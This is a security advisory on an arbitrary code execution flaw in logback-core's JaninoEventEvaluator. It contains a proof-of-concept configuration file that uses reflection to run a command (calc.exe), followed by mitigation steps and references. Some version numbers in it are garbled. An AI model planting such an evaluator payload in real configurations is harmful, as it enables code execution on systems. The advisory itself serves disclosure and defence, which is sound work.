A critical Arbitrary Code Execution (ACE) vulnerability has been found in the JaninoEventEvaluator, a popular logging library in Java applications. This vulnerability is present in QOS.CH logback-core up to including versions .1 to 1.3.14 and 1.4. to 1.5.12. It poses a significant security risk as it allows an attacker to execute arbitrary code remotely by compromising an existing logback configuration file or by injecting an environment variable before program execution.

Vulnerability Details

The JaninoEventEvaluator extension is prone to an ACE vulnerability that can be exploited through malicious logback configuration files. To successfully execute an attack, the attacker must have write access to a configuration file. This could also be achieved by injecting a malicious environment variable pointing to a malicious configuration file. In both scenarios, the attack requires existing privilege.

The following code snippet demonstrates the vulnerability

<configuration>
<appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
<encoder>
    <pattern>%msg%n</pattern>
</encoder>
 
<evaluator name="arbitraryCode" class="ch.qos.logback.core.boolex.JaninoEventEvaluator">
 <expression><![CDATA[
    boolean a = true;
    "".getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec("calc.exe");
    return a;
 ]]></expression>
 </evaluator>
 
<filter class="ch.qos.logback.core.filter.EvaluatorFilter">
 <evaluator>arbitraryCode</evaluator>
 <onMismatch>DENY</onMismatch>
</filter>
</appender>

In this example, once the logback configuration file is processed, the attacker's payload (in this case, "calc.exe") is executed.

To mitigate this vulnerability, users are advised to

1. Update their logback-core version to the most recent version (1.3.15-alpha4 or 1.5.13-alpha4) from the official website (https://logback.qos.ch/).
2. Restrict access to logback configuration files and ensure that only authorized users have write permissions.

References

1. QOS.CH - Logback: The Generic, Reliable, Fast, and Flexible Logging Framework for Java - https://logback.qos.ch/
2. GitHub Issue - JaninoEventEvaluator: arbitrary code execution through logback configuration - https://github.com/qos-ch/logback/issues/880
3. Logback Reference Manual - JaninoEventEvaluator - https://logback.qos.ch/manual/filters.html#JaninoEventEvaluator

Conclusion

This critical ACE vulnerability in the JaninoEventEvaluator poses a severe risk to users of the affected versions in their Java applications. Users are strongly encouraged to update their logback-core to the latest versions (1.3.15-alpha4 or 1.5.13-alpha4) and restrict access to configuration files as well as validating environment variables to minimize the risk of a successful attack.

Timeline

Published on: 12/19/2024 16:15:07 UTC
Last modified on: 01/03/2025 14:15:24 UTC